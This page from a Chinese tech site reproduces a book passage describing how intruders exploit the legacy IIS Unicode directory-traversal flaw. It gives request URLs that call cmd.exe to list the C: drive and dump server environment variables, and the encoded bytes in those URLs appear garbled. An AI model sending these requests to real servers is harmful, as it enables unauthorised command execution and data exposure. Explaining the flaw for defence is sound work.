当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(14)

安全基础
smss.exe文件干啥用?smss进程病毒
去掉右键菜单中的显卡相关设置菜单
usb-creator创建启动U盘失败
autorun.inf病毒详解
偷菜行为可耻,租菜场游戏更有意思
解决Win XP打印共享问题
在搜索引擎中如何更加准确的找到自己需要的图片
新手入门:有效防止邮件病毒的侵入的9则技巧
推荐面向新浪微博的3款实用工具
如何彻底解决路由器安全问题
无线宽带路由故障问题解决方案
网络速度慢常见的23种解决方法
ekrn.exe占用CPU100%,认识ekrn.exe进程
邮件病毒定义及特征和防范邮件病毒入侵
新手指南:安装防火墙的注意事项
单位局域网打印共享服务器故障解决一例
双击不能打开盘符只能右键菜单打开
卸载电脑中应用程序的5种方法
Wi-Fi无线连接常见故障和解决办法
ADSL虚拟拨号出现故障的解决办法及注意事项

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(14)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 46 ::
收藏到网摘: n/a

6.9 UNICODE漏洞入侵(3)

    

6.9.2  利用UNICODE漏洞攻击网站

(1) 入侵者在手工或是使用扫描工具找到有UNICODE漏洞的服务器后,在浏览器中输入:

http://目标机/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c:\

http://目标机/scripts/..À/../winnt/system32/cmd.exe?/c+dir+c:\

(其他编码检测请参阅本书3.7.1 节中UNICODE漏洞的修补)

通过以上输入向服务器发出请求,得到结果如图6-80所示。

6-80  UNICODE漏洞

这里以本机(IP127.0.0.1)存在的UNICODE漏洞进行检测,从图6-80中可以看到被检测服务器的C盘目录被列了出来,这就是所谓的UNICODE漏洞,也叫目录遍历漏洞。

(2) 接下来入侵者将会去查找服务器所存放主页的位置,接着在浏览器中向存有UNICODE漏洞的服务器发送一条请求,请求内容如下:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd.exe?/c+set 

或是

http://127.0.0.1/scripts/..À/../winnt/system32/cmd.exe?/c+set

得到的结果如图6-81所示。

6-81  查看服务器信息

<